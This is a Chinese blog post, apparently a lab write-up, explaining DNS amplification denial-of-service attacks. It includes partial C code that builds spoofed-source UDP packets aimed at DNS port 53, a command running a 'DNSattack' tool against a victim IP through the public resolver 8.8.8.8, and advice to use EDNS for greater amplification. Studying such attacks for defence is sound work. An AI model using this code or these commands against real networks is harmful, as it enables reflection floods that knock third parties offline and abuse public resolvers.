DNS放大攻击初探

一、什么是DNS放大攻击

DNS放大攻击是一种新型的拒绝服务攻击,攻击者利用僵尸网络中大量的被控主机,伪装成被攻击主机,在特定时间点连续向多个允许递归查询的DNS服务器发送大量DNS服务请求,迫使其提供应答服务,经DNS服务器放大后的大量应答数据发送到被攻击主机,形成攻击流量,导致其无法提供正常服务甚至瘫痪。

二、DNS放大攻击的原理

关于DNS的解析原理:

DNS 客户机需要查询程序中使用的名称时,它会查询本地DNS服务器来解析该名称。客户机发送的每条查询消息都包括3条信息,以指定服务器应回答的问题。

● 指定的 DNS 域名,表示为完全合格的域名 (FQDN) 。

● 指定的查询类型,它可根据类型指定资源记录,或作为查询操作的专门类型。

● DNS域名的指定类别。对于DNS 服务器,它始终应指定为 Internet 类别。例如,指定的名称可以是计算机的完全合格的域名,如im.qq.com,并且指定的查询类型用于通过该名称搜索地址资源记录。DNS 查询以各种不同的方式进行解析。客户机有时也可通过使用从以前查询获得的缓存信息就地应答查询。DNS 服务器可使用其自身的资源记录信息缓存来应答查询,也可代表请求客户机来查询或联系其他DNS服务器,以完全解析该名称,并随后将应答返回至客户机。这个过程称为递归。

另外,客户机自己也可尝试联系其他的DNS服务器来解析名称。如果客户机这么做,它会使用基于服务器应答的独立和附加的查询,该过程称作迭代,即DNS服务器之间的交互查询就是迭代查询。

DNS放大攻击首先要找到支持递归查询的第三方DNS服务器,并向其发送一个查询请求,这台DNS服务器随后会把这个查询按照递归原则发送给其他DNS服务器。之后攻击者会向这些服务器发送一个DNS记录查询,在这些DNS服务器上存储一个文本记录用于DNS放大攻击,接着攻击者会以被攻击者IP的地址向服务器发送带有EDNS选项的DNS查询信息,这些第三方DNS服务器会使用经过放大的文本进行回复,用大量的UDP数据包淹没被攻击者

三、DNS放大技术的特点

DNS协议的弱点导致了DNS放大攻击的实现成为可能。因为DNS查询请求报文以及查询应答报文都可以被伪造,黑客通过修改源地址伪装成被攻击主机向DNS服务器发送DNS查询请求,如果是操纵大量僵尸进行攻击的话,破坏力是非常惊人的。DNS在对服务器的域名解析时,无法判断查询报文是否是恶意的,这样就使得攻击者的身份得以伪装。同时,DNS在返回报文时的长度要比查询报文的长度大,因此,利用这些特性,DNS放大攻击变得攻击力强大,使用又非常安全方便。

在2005年之前,攻击者向DNS服务器发出60个字节的查询信息,收到512个自己的回应信息,使通信量放大8.5倍。随着DNS协议被深入研究,攻击者发现利用其具有的递归查询功能,可以将通信量放大原来的66倍。如果攻击者操纵数以万计的傀儡机向DNS发送查询请求,那么得到的响应的通信量甚至可以超过100G/每秒。主要代码如下:

/* DNS 头定义 */

struct dnshdr

{

unsigned short id;

unsigned short flags;

unsigned short qdcount;

unsigned short ancount;

unsigned short nscount;

unsigned short arcount;

};

#pragma pack(pop)

int t_raw_socket = 0;

int t_scr_ip = 0;

int t_dns_ip = 0;

int t_send_interval = 0;

int count = 0;

/**

校验和函数

*/

unsigned short csum(unsigned short *buf, int nwords)

{

unsigned long sum;

for (sum = 0; nwords > 0; nwords–)

   sum += *buf++;

sum = (sum >> 16) + (sum & 0xffff);

sum += (sum >> 16);

return ~sum;

}

/**

  • 组装udp包

*/

int build_udp_ip_packet(char *packet, unsigned int payload_size, uint32_t src_ip, uint32_t dst_ip, u_int16_t port)

{

struct ip *ip_hdr = (struct ip *) packet;

struct udphdr *udp_hdr = (struct udphdr *) (packet + sizeof (struct ip));

ip_hdr->ip_hl = 5; //包头长度

ip_hdr->ip_v = 4; //ipv4

ip_hdr->ip_tos = 0; //tos

ip_hdr->ip_len = sizeof(struct ip) + sizeof(struct udphdr) + payload_size; //ip包长度

ip_hdr->ip_id = 0; //id

ip_hdr->ip_off = 0; //fragment offset

ip_hdr->ip_ttl = 255; //ttl

ip_hdr->ip_p = 17; //udp协议

ip_hdr->ip_sum = 0; //临时 checksum

ip_hdr->ip_src.s_addr = src_ip; //原ip

ip_hdr->ip_dst.s_addr = dst_ip; //目的ip

udp_hdr->source = port; //原端口

udp_hdr->dest = htons(53); //目标端口

udp_hdr->len = htons(sizeof(struct udphdr) + payload_size); //udp包长度

udp_hdr->check = 0; //udp校验和

ip_hdr->ip_sum = csum((unsigned short *) packet, ip_hdr->ip_len >> 1); //计算真ip校验和

return ip_hdr->ip_len >> 1;

}

void Sleep(uint32_t msec)

{

struct timespec slptm;

slptm.tv_sec = msec / 1000;

slptm.tv_nsec = 1000 * 1000 * (msec - (msec / 1000) * 1000); //1000 ns = 1 us

if (nanosleep(&slptm, NULL) != -1)

{

}

else

{

   fprintf(stderr,"%s : %u", "nanosleep failed !!\n", msec);

}

}

具体效果:

在受攻击WINDOWS XP主机下开启Wireshark监听流量反馈

可以看到网络在开启攻击后中断。

四、实验步骤

我们在BackTrack5服务器上运行DNSattack程序,输入命令:DNSattack 192.168.29.74 www.0test.tk 8.8.8.8 1000 1

五、命令说明

DNSattack为程序名、192.168.29.74为同一子网的受攻击主机,www.0test.tk为查询的域名,8.8.8.8作为递归查询的服务器将查询包放大。1000作为查询次数。1为发包间隔为1ms。

六、实验结果

实验结果说明,通过编写的DNSattack程序,对受害主机进行攻击,可以阻塞目标网络。因为DNS返回的数据包通过UDP协议,而UDP协议是无连接的。所以在大量的长度很大的UDP包的冲击下,网络出口出现阻塞。我们发送的DNS请求包大小为72字节,收到的DNS返回包为520字节。发大后的倍数达到7倍。初步达到了放大攻击的效果。

而目前递归查询的功能对DNS放大攻击的效果有明显加倍,如果需要进一步放大,这里要用到EDNS协议,这是一个新的DNS拓展协议。这个协议可以使UDP的数据包达到3.4KB,用以实现DNS放大攻击。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小黑安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值